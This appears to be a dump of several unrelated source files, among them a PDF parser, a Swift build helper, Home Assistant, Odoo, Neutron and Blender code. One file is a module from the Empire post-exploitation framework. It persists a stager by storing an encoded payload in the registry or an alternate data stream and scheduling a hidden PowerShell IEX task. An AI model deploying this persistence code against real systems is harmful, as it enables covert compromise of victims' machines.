if not isinstance(x, str):
if STRICT:
raise PDFTypeError('String required: %r' % x)
return ''
return x
def list_value(x):
x = resolve1(x)
if not (isinstance(x, list) or isinstance(x, tuple)):
if STRICT:
raise PDFTypeError('List required: %r' % x)
return []
return x
def dict_value(x):
x = resolve1(x)
if not isinstance(x, dict):
if STRICT:
raise PDFTypeError('Dict required: %r' % x)
return {}
return x
def stream_value(x):
x = resolve1(x)
if not isinstance(x, PDFStream):
if STRICT:
raise PDFTypeError('PDFStream required: %r' % x)
return PDFStream({}, '')
return x
## PDFStream type
##
class PDFStream(PDFObject):
def __init__(self, attrs, rawdata, decipher=None):
assert isinstance(attrs, dict)
self.attrs = attrs
self.rawdata = rawdata
self.decipher = decipher
self.data = None
self.objid = None
self.genno = None
return
def set_objid(self, objid, genno):
self.objid = objid
self.genno = genno
return
def __repr__(self):
if self.data is None:
assert self.rawdata is not None
return '<PDFStream(%r): raw=%d, %r>' % (self.objid, len(self.rawdata), self.attrs)
else:
assert self.data is not None
return '<PDFStream(%r): len=%d, %r>' % (self.objid, len(self.data), self.attrs)
def __contains__(self, name):
return name in self.attrs
def __getitem__(self, name):
return self.attrs[name]
def get(self, name, default=None):
return self.attrs.get(name, default)
def get_any(self, names, default=None):
for name in names:
if name in self.attrs:
return self.attrs[name]
return default
def get_filters(self):
filters = self.get_any(('F', 'Filter'))
if not filters: return []
if isinstance(filters, list): return filters
return [ filters ]
def decode(self):
assert self.data is None and self.rawdata != None
data = self.rawdata
if self.decipher:
# Handle encryption
data = self.decipher(self.objid, self.genno, data)
filters = self.get_filters()
if not filters:
self.data = data
self.rawdata = None
return
for f in filters:
if f in LITERALS_FLATE_DECODE:
# will get errors if the document is encrypted.
try:
data = zlib.decompress(data)
except zlib.error:
data = ''
elif f in LITERALS_LZW_DECODE:
data = lzwdecode(data)
elif f in LITERALS_ASCII85_DECODE:
data = ascii85decode(data)
elif f in LITERALS_ASCIIHEX_DECODE:
data = asciihexdecode(data)
elif f in LITERALS_RUNLENGTH_DECODE:
data = rldecode(data)
elif f in LITERALS_CCITTFAX_DECODE:
#data = ccittfaxdecode(data)
raise PDFNotImplementedError('Unsupported filter: %r' % f)
elif f == LITERAL_CRYPT:
# not yet..
raise PDFNotImplementedError('/Crypt filter is unsupported')
else:
raise PDFNotImplementedError('Unsupported filter: %r' % f)
# apply predictors
params = self.get_any(('DP', 'DecodeParms', 'FDecodeParms'), {})
if 'Predictor' in params and 'Columns' in params:
pred = int_value(params['Predictor'])
columns = int_value(params['Columns'])
if pred:
if pred != 12:
raise PDFNotImplementedError('Unsupported predictor: %r' % pred)
buf = ''
ent0 = '\x00' * columns
for i in xrange(0, len(data), columns+1):
pred = data[i]
ent1 = data[i+1:i+1+columns]
if pred == '\x02':
ent1 = ''.join( chr((ord(a)+ord(b)) & 255) for (a,b) in zip(ent0,ent1) )
buf += ent1
ent0 = ent1
data = buf
self.data = data
self.rawdata = None
return
def get_data(self):
if self.data is None:
self.decode()
return self.data
def get_rawdata(self):
return self.rawdata
| gpl-2.0 |
pasv/Empire | lib/modules/persistence/userland/schtasks.py | 13 | 9540 | import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) using schtasks. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKCU:\Software\Microsoft\Windows\CurrentVersion\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if idleTime != '':
script += "schtasks /Create /F /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
return script
| bsd-3-clause |
sklnet/opendroid-enigma2 | lib/python/Components/Renderer/DMCHDCaids.py | 11 | 2849 | #
# Caids - Renderer
#
# Coded by Dr.Best (c) 2010
# Support: www.dreambox-tools.info
#
# This plugin is licensed under the Creative Commons
# Attribution-NonCommercial-ShareAlike 3.0 Unported
# License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc-sa/3.0/ or send a letter to Creative
# Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
#
# Alternatively, this plugin may be distributed and executed on hardware which
# is licensed by Dream Multimedia GmbH.
# This plugin is NOT free software. It is open source, you are allowed to
# modify it (if you keep the license), but it may not be commercially
# distributed other than under the conditions noted above.
#
from Renderer import Renderer
from enigma import eCanvas, eRect, gFont
from skin import parseColor, parseFont
class DMCHDCaids(Renderer):
GUI_WIDGET = eCanvas
def __init__(self):
Renderer.__init__(self)
self.backgroundColor = parseColor("#ff000000")
self.nocColor = parseColor("#00aaaaaa")
self.emmColor = parseColor("#00aaaaaa")
self.ecmColor = parseColor("#0056c856")
self.font = gFont("Regular", 20)
def pull_updates(self):
if self.instance is None:
return
self.instance.clear(self.backgroundColor)
caidlist = self.source.getCaidlist
if caidlist is None:
return
self.draw(caidlist)
def draw(self, caidlist):
offset = 0
pointSize = self.font.pointSize
for key in caidlist:
if caidlist[key][0]:
if caidlist[key][1] == 0:
foregroundColor = self.nocColor
elif caidlist[key][1] == 1:
foregroundColor = self.emmColor
else:
foregroundColor = self.ecmColor
length = len(caidlist[key][0]) * (pointSize)
self.instance.writeText(eRect(offset, 0, length, pointSize), foregroundColor, self.backgroundColor, self.font, caidlist[key][0], 2)
offset = offset + length
def changed(self, what):
self.pull_updates()
def applySkin(self, desktop, parent):
attribs = [ ]
from enigma import eSize
def parseSize(str):
x, y = str.split(',')
return eSize(int(x), int(y))
for (attrib, value) in self.skinAttributes:
if attrib == "size":
self.instance.setSize(parseSize(value))
attribs.append((attrib,value))
elif attrib == "nocColor":
self.nocColor = parseColor(value)
elif attrib == "emmColor":
self.emmColor = parseColor(value)
elif attrib == "ecmColor":
self.ecmColor = parseColor(value)
elif attrib == "font":
self.font = parseFont(value, ((1,1),(1,1)))
elif attrib == "backgroundColor":
self.backgroundColor = parseColor(value)
self.instance.clear(self.backgroundColor)
attribs.append((attrib,value))
else:
attribs.append((attrib,value))
self.skinAttributes = attribs
return Renderer.applySkin(self, desktop, parent)
| gpl-2.0 |
calebd/swift | utils/swift_build_support/swift_build_support/workspace.py | 38 | 3857 | # swift_build_support/workspace.py ------------------------------*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
"""
Represent whole source tree and the build directory
"""
# ----------------------------------------------------------------------------
import os.path
class Workspace(object):
def __init__(self, source_root, build_root):
self.source_root = source_root
self.build_root = build_root
def source_dir(self, path):
return os.path.join(self.source_root, path)
def build_dir(self, deployment_target, product):
return os.path.join(self.build_root,
'%s-%s' % (product, deployment_target))
def compute_build_subdir(args):
# Create a name for the build directory.
build_subdir = args.cmake_generator.replace(" ", "_")
cmark_build_dir_label = args.cmark_build_variant
if args.cmark_assertions:
cmark_build_dir_label += "Assert"
llvm_build_dir_label = args.llvm_build_variant
if args.llvm_assertions:
llvm_build_dir_label += "Assert"
swift_build_dir_label = args.swift_build_variant
if args.swift_assertions:
swift_build_dir_label += "Assert"
if args.swift_analyze_code_coverage != "false":
swift_build_dir_label += "Coverage"
swift_stdlib_build_dir_label = args.swift_stdlib_build_variant
if args.swift_stdlib_assertions:
swift_stdlib_build_dir_label += "Assert"
# FIXME: mangle LLDB build configuration into the directory name.
if (llvm_build_dir_label == swift_build_dir_label and
llvm_build_dir_label == swift_stdlib_build_dir_label and
swift_build_dir_label == cmark_build_dir_label):
# Use a simple directory name if all projects use the same build
# type.
build_subdir += "-" + llvm_build_dir_label
elif (llvm_build_dir_label != swift_build_dir_label and
llvm_build_dir_label == swift_stdlib_build_dir_label and
swift_build_dir_label == cmark_build_dir_label):
# Swift build type differs.
build_subdir += "-" + llvm_build_dir_label
build_subdir += "+swift-" + swift_build_dir_label
elif (llvm_build_dir_label == swift_build_dir_label and
llvm_build_dir_label != swift_stdlib_build_dir_label and
swift_build_dir_label == cmark_build_dir_label):
# Swift stdlib build type differs.
build_subdir += "-" + llvm_build_dir_label
build_subdir += "+stdlib-" + swift_stdlib_build_dir_label
elif (llvm_build_dir_label == swift_build_dir_label and
llvm_build_dir_label == swift_stdlib_build_dir_label and
swift_build_dir_label != cmark_build_dir_label):
# cmark build type differs.
build_subdir += "-" + llvm_build_dir_label
build_subdir += "+cmark-" + cmark_build_dir_label
else:
# We don't know how to create a short name, so just mangle in all
# the information.
build_subdir += "+cmark-" + cmark_build_dir_label
build_subdir += "+llvm-" + llvm_build_dir_label
build_subdir += "+swift-" + swift_build_dir_label
build_subdir += "+stdlib-" + swift_stdlib_build_dir_label
# If we have a sanitizer enabled, mangle it into the subdir.
if args.enable_asan:
build_subdir += "+asan"
if args.enable_ubsan:
build_subdir += "+ubsan"
if args.enable_tsan:
build_subdir += "+tsan"
return build_subdir
| apache-2.0 |
bdfoster/blumate | blumate/components/binary_sensor/rest.py | 1 | 2622 | """
Support for RESTful binary sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/binary_sensor.rest/
"""
import logging
from blumate.components.binary_sensor import (BinarySensorDevice,
SENSOR_CLASSES)
from blumate.components.sensor.rest import RestData
from blumate.const import CONF_VALUE_TEMPLATE
from blumate.helpers import template
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'REST Binary Sensor'
DEFAULT_METHOD = 'GET'
# pylint: disable=unused-variable
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the REST binary sensor."""
resource = config.get('resource', None)
method = config.get('method', DEFAULT_METHOD)
payload = config.get('payload', None)
verify_ssl = config.get('verify_ssl', True)
sensor_class = config.get('sensor_class')
if sensor_class not in SENSOR_CLASSES:
_LOGGER.warning('Unknown sensor class: %s', sensor_class)
sensor_class = None
rest = RestData(method, resource, payload, verify_ssl)
rest.update()
if rest.data is None:
_LOGGER.error('Unable to fetch Rest data')
return False
add_devices([RestBinarySensor(
hass,
rest,
config.get('name', DEFAULT_NAME),
sensor_class,
config.get(CONF_VALUE_TEMPLATE))])
# pylint: disable=too-many-arguments
class RestBinarySensor(BinarySensorDevice):
"""Representation of a REST binary sensor."""
def __init__(self, hass, rest, name, sensor_class, value_template):
"""Initialize a REST binary sensor."""
self._hass = hass
self.rest = rest
self._name = name
self._sensor_class = sensor_class
self._state = False
self._value_template = value_template
self.update()
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def sensor_class(self):
"""Return the class of this sensor."""
return self._sensor_class
@property
def is_on(self):
"""Return true if the binary sensor is on."""
if self.rest.data is None:
return False
if self._value_template is not None:
self.rest.data = template.render_with_possible_json_value(
self._hass, self._value_template, self.rest.data, False)
return bool(int(self.rest.data))
def update(self):
"""Get the latest data from REST API and updates the state."""
self.rest.update()
| mit |
rbalda/neural_ocr | env/lib/python2.7/site-packages/pybrain/tests/unittests/test_capturegame_network.py | 4 | 1378 | """
Build a CaptureGameNetwork with LSTM cells
>>> from pybrain.structure.networks.custom import CaptureGameNetwork
>>> from pybrain import MDLSTMLayer
>>> size = 2
>>> n = CaptureGameNetwork(size = size, componentclass = MDLSTMLayer, hsize = 1, peepholes = False)
Check it's string representation
>>> print n
CaptureGameNetwork-s2-h1-MDLSTMLayer--...
Modules:
[<BiasUnit 'bias'>, <LinearLayer 'input'>, <MDLSTMLayer 'hidden(0, 0, 0)'>, ... <MDLSTMLayer 'hidden(0, 0, 3)'>, <SigmoidLayer 'output'>]
Connections:
[<IdentityConnection ...
Check some of the connections dimensionalities
>>> c1 = n.connections[n['hidden(1, 0, 3)']][0]
>>> c2 = n.connections[n['hidden(0, 1, 2)']][-1]
>>> print c1.indim, c1.outdim
1 1
>>> print c2.indim, c2.outdim
1 1
>>> n.paramdim
21
Try writing it to an xml file, reread it and determine if it looks the same:
>>> from pybrain.tests import xmlInvariance
>>> xmlInvariance(n)
Same representation
Same function
Same class
Check its gradient:
>>> from pybrain.tests import gradientCheck
>>> gradientCheck(n)
Perfect gradient
True
"""
__author__ = 'Tom Schaul, tom@idsia.ch'
from pybrain.tests import runModuleTestSuite
if __name__ == '__main__':
runModuleTestSuite(__import__('__main__'))
| mit |
BT-rmartin/odoo | addons/payment_sips/controllers/main.py | 153 | 1864 | # -*- coding: utf-8 -*-
try:
import simplejson as json
except ImportError:
import json
import logging
import werkzeug
from openerp import http
from openerp.http import request
_logger = logging.getLogger(__name__)
class SipsController(http.Controller):
_notify_url = '/payment/sips/ipn/'
_return_url = '/payment/sips/dpn/'
def _get_return_url(self, **post):
""" Extract the return URL from the data coming from sips. """
return_url = post.pop('return_url', '')
if not return_url:
tx_obj = request.registry['payment.transaction']
data = tx_obj._sips_data_to_object(post.get('Data'))
custom = json.loads(data.pop('returnContext', False) or '{}')
return_url = custom.get('return_url', '/')
return return_url
def sips_validate_data(self, **post):
res = False
env = request.env
tx_obj = env['payment.transaction']
acquirer_obj = env['payment.acquirer']
sips = acquirer_obj.search([('provider', '=', 'sips')], limit=1)
security = sips._sips_generate_shasign(post)
if security == post['Seal']:
_logger.debug('Sips: validated data')
res = tx_obj.sudo().form_feedback(post, 'sips')
else:
_logger.warning('Sips: data are corrupted')
return res
@http.route([
'/payment/sips/ipn/'],
type='http', auth='none', methods=['POST'])
def sips_ipn(self, **post):
""" Sips IPN. """
self.sips_validate_data(**post)
return ''
@http.route([
'/payment/sips/dpn'], type='http', auth="none", methods=['POST'])
def sips_dpn(self, **post):
""" Sips DPN """
return_url = self._get_return_url(**post)
self.sips_validate_data(**post)
return werkzeug.utils.redirect(return_url)
| agpl-3.0 |
mmnelemane/neutron | neutron/tests/api/test_flavors_extensions.py | 23 | 6787 | # Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.tests.api import base
from neutron.tests.tempest import test
LOG = logging.getLogger(__name__)
class TestFlavorsJson(base.BaseAdminNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
List, Show, Create, Update, Delete Flavors
List, Show, Create, Update, Delete service profiles
"""
@classmethod
def resource_setup(cls):
super(TestFlavorsJson, cls).resource_setup()
if not test.is_extension_enabled('flavors', 'network'):
msg = "flavors extension not enabled."
raise cls.skipException(msg)
service_type = "LOADBALANCER"
description_flavor = "flavor is created by tempest"
name_flavor = "Best flavor created by tempest"
cls.flavor = cls.create_flavor(name_flavor, description_flavor,
service_type)
description_sp = "service profile created by tempest"
# Future TODO(madhu_ak): Right now the dummy driver is loaded. Will
# make changes as soon I get to know the flavor supported drivers
driver = ""
metainfo = '{"data": "value"}'
cls.service_profile = cls.create_service_profile(
description=description_sp, metainfo=metainfo, driver=driver)
def _delete_service_profile(self, service_profile_id):
# Deletes a service profile and verifies if it is deleted or not
self.admin_client.delete_service_profile(service_profile_id)
# Asserting that service profile is not found in list after deletion
labels = self.admin_client.list_service_profiles(id=service_profile_id)
self.assertEqual(len(labels['service_profiles']), 0)
@test.attr(type='smoke')
@test.idempotent_id('ec8e15ff-95d0-433b-b8a6-b466bddb1e50')
def test_create_update_delete_service_profile(self):
# Creates a service profile
description = "service_profile created by tempest"
driver = ""
metainfo = '{"data": "value"}'
body = self.admin_client.create_service_profile(
description=description, driver=driver, metainfo=metainfo)
service_profile = body['service_profile']
# Updates a service profile
self.admin_client.update_service_profile(service_profile['id'],
enabled=False)
self.assertTrue(service_profile['enabled'])
# Deletes a service profile
self.addCleanup(self._delete_service_profile,
service_profile['id'])
# Assert whether created service profiles are found in service profile
# lists or fail if created service profiles are not found in service
# profiles list
labels = (self.admin_client.list_service_profiles(
id=service_profile['id']))
self.assertEqual(len(labels['service_profiles']), 1)
@test.attr(type='smoke')
@test.idempotent_id('ec8e15ff-95d0-433b-b8a6-b466bddb1e50')
def test_create_update_delete_flavor(self):
# Creates a flavor
description = "flavor created by tempest"
service = "LOADBALANCERS"
name = "Best flavor created by tempest"
body = self.admin_client.create_flavor(name=name, service_type=service,
description=description)
flavor = body['flavor']
# Updates a flavor
self.admin_client.update_flavor(flavor['id'], enabled=False)
self.assertTrue(flavor['enabled'])
# Deletes a flavor
self.addCleanup(self._delete_flavor, flavor['id'])
# Assert whether created flavors are found in flavor lists or fail
# if created flavors are not found in flavors list
labels = (self.admin_client.list_flavors(id=flavor['id']))
self.assertEqual(len(labels['flavors']), 1)
@test.attr(type='smoke')
@test.idempotent_id('30abb445-0eea-472e-bd02-8649f54a5968')
def test_show_service_profile(self):
# Verifies the details of a service profile
body = self.admin_client.show_service_profile(
self.service_profile['id'])
service_profile = body['service_profile']
self.assertEqual(self.service_profile['id'], service_profile['id'])
self.assertEqual(self.service_profile['description'],
service_profile['description'])
self.assertEqual(self.service_profile['metainfo'],
service_profile['metainfo'])
self.assertEqual(True, service_profile['enabled'])
@test.attr(type='smoke')
@test.idempotent_id('30abb445-0eea-472e-bd02-8649f54a5968')
def test_show_flavor(self):
# Verifies the details of a flavor
body = self.admin_client.show_flavor(self.flavor['id'])
flavor = body['flavor']
self.assertEqual(self.flavor['id'], flavor['id'])
self.assertEqual(self.flavor['description'], flavor['description'])
self.assertEqual(self.flavor['name'], flavor['name'])
self.assertEqual(True, flavor['enabled'])
@test.attr(type='smoke')
@test.idempotent_id('e2fb2f8c-45bf-429a-9f17-171c70444612')
def test_list_flavors(self):
# Verify flavor lists
body = self.admin_client.list_flavors(id=33)
flavors = body['flavors']
self.assertEqual(0, len(flavors))
@test.attr(type='smoke')
@test.idempotent_id('e2fb2f8c-45bf-429a-9f17-171c70444612')
def test_list_service_profiles(self):
# Verify service profiles lists
body = self.admin_client.list_service_profiles(id=33)
service_profiles = body['service_profiles']
self.assertEqual(0, len(service_profiles))
def _delete_flavor(self, flavor_id):
# Deletes a flavor and verifies if it is deleted or not
self.admin_client.delete_flavor(flavor_id)
# Asserting that the flavor is not found in list after deletion
labels = self.admin_client.list_flavors(id=flavor_id)
self.assertEqual(len(labels['flavors']), 0)
class TestFlavorsIpV6TestJSON(TestFlavorsJson):
_ip_version = 6
| apache-2.0 |
Berling/project-zombye-exporter | io_exporter_zombye/export_zmdl.py | 1 | 8360 | # The MIT License (MIT)
#
# Copyright (c) 2015 Georg Schäfer
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import bmesh
import bpy
import json
def triangulate(obj):
mesh = bmesh.new()
mesh.from_mesh(obj.data)
bmesh.ops.triangulate(mesh, faces=mesh.faces)
return mesh
def mesh_data(obj, bone_ids):
mesh = triangulate(obj)
meshdata = {}
vertices_lookup = {}
vertices = []
indices = []
submeshes = {}
write_skin = False
vertex_groups = obj.vertex_groups
dvert_layer = mesh.verts.layers.deform.active
if bone_ids is not None and vertex_groups is not None and dvert_layer is not None:
write_skin = True
uv_layer = mesh.loops.layers.uv.active
if uv_layer is None:
raise TypeError("mesh %s has no active uv layer" %obj.data.name)
for material_slot in obj.material_slots:
material = material_slot.material
if material.users > 0:
submeshes[material.name] = {}
submeshes[material.name]["indices"] = []
submeshes[material.name]["textures"] = {}
texture_slots = material.texture_slots
textures = ["diffuse", "normal", "material"]
for texture in textures:
for key, value in texture_slots.items():
if texture in key:
submeshes[material.name]["textures"][texture] = bpy.path.abspath(value.texture.image.filepath)
break
else:
submeshes[material.name]["textures"][texture] = ""
for face in mesh.faces:
triangle = []
for loop in face.loops:
vertex = loop.vert
position = vertex.co
normal = face.normal
if face.smooth:
normal = vertex.normal
texcoord = loop[uv_layer].uv
vertexattributes = {}
vertexattributes["position"] = [position.x, position.y, position.z]
vertexattributes["texcoord"] = [texcoord.x, 1.0 - texcoord.y]
vertexattributes["normal"] = [normal.x, normal.y, normal.z]
vertex_tupel = (
vertexattributes["position"][0],
vertexattributes["position"][1],
vertexattributes["position"][2],
vertexattributes["texcoord"][0],
vertexattributes["texcoord"][1],
vertexattributes["normal"][0],
vertexattributes["normal"][1],
vertexattributes["normal"][2]
)
if vertex_tupel not in vertices_lookup:
vertices_lookup[vertex_tupel] = len(vertices)
vertices.append(vertexattributes)
triangle.append(vertices_lookup[vertex_tupel])
if write_skin:
dvert = vertex[dvert_layer]
if len(dvert.values()) > 4:
raise ValueError("vertex is assigned to too many vertex groups")
if len(dvert.values()) == 0:
parent_name = vertex_groups
vertexattributes["indices"] = [0]
vertexattributes["weights"] = [1.0]
else:
vertexattributes["indices"] = []
vertexattributes["weights"] = []
for key, value in dvert.items():
bone_name = vertex_groups[key].name
index = bone_ids[bone_name]
vertexattributes["indices"].append(index)
vertexattributes["weights"].append(value)
material = obj.material_slots[face.material_index].material
submeshes[material.name]["indices"].append(triangle)
meshdata["vertices"] = vertices
meshdata["submeshes"] = submeshes
mesh.free()
del mesh
return meshdata
from mathutils import Matrix, Quaternion
def anim_data(armature, bone_ids):
armature_data = {}
armature_data["skeleton"] = {}
ids = 0
armature_data["bone_hierachy"] = {}
for i in range(0, len(armature.bones)):
armature_data["bone_hierachy"][i] = []
for bone in armature.bones:
bone_data = {}
if bone.name not in bone_ids:
bone_ids[bone.name] = ids
ids += 1
bone_data["id"] = bone_ids[bone.name]
parent = bone.parent
parent_transformation = Matrix()
parent_transformation.identity()
if parent is None:
bone_data["parent"] = None
else:
if parent.name not in bone_ids:
bone_ids[parent.name] = ids
ids += 1
bone_data["parent"] = bone_ids[parent.name]
parent_transformation = armature.bones[bone_data["parent"]].matrix_local
armature_data["bone_hierachy"][bone_data["parent"]].append(bone_data["id"])
transformation = parent_transformation.inverted() * bone.matrix_local
rot = transformation.to_quaternion()
rot.normalize()
bone_data["rotation"] = [rot.w, rot.x, rot.y, rot.z]
pos = transformation.to_translation()
bone_data["translation"] = [pos.x, pos.y, pos.z]
scale = transformation.to_scale()
bone_data["scale"] = [scale.x, scale.y, scale.z]
armature_data["skeleton"][bone_ids[bone.name]] = bone_data
armature_data["animations"] = {}
for action in bpy.data.actions:
armature_data["animations"][action.name] = {}
frame_range = action.frame_range
armature_data["animations"][action.name]["length"] = frame_range[1] - frame_range[0]
armature_data["animations"][action.name]["tracks"] = {}
old_name = ""
for fcu in action.fcurves:
bone_name = fcu.data_path
bone_name = bone_name[12:len(bone_name)]
bone_name = bone_name[0:bone_name.find("\"")]
bone_id = bone_ids[bone_name]
if bone_name not in armature_data["animations"][action.name]["tracks"]:
armature_data["animations"][action.name]["tracks"][bone_name] = {}
armature_data["animations"][action.name]["tracks"][bone_name]["id"] = bone_id
transformation_name = fcu.data_path
transformation_name = transformation_name[transformation_name.rfind(".") + 1:len(transformation_name)]
trans = armature_data["animations"][action.name]["tracks"][bone_name]
if transformation_name not in trans:
trans[transformation_name] = []
index = 0
for keyframe in fcu.keyframe_points:
if transformation_name != old_name:
trans[transformation_name].append({});
trans[transformation_name][-1]["frame"] = keyframe.co.x - frame_range[0]
trans[transformation_name][-1]["data"] = []
trans[transformation_name][index]["data"].append(keyframe.co.y)
index += 1
old_name = transformation_name
return armature_data
def write_json(file, data):
json.dump(data, file, indent="\t", separators=(',', ' : '))
def write_model(filepath, selected, parallax_mapping):
models = {}
objects = None
if selected:
objects = bpy.context.selected_objects
else:
objects = bpy.data.objects
